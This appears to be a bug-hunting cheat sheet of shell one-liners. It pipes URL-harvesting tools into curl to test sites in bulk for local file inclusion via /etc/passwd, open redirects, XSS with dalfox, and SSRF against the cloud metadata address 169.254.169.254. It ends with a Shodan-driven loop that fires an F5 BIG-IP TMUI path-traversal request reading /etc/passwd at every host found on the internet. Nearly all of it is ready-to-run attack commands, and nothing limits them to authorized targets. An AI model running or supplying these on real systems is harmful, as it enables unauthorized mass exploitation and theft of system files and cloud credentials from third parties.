LFI : gau domain.
tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c
'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
Open Redirect : export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace
"$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST"
&& echo "VULN! %"'
XSS : gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|
tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk
'{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
Cloud SSRF: cat blindssrftesturl.txt | sort -u | anew | httpx | qsreplace
'http://169.254.169.254/latest/meta-data/hostname' | xargs -I % -P 25 sh -c 'curl -
ks “%” 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator
" " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --
insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?
fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" ||
printf "$host \033[0;32mNot Vulnerable\n";done
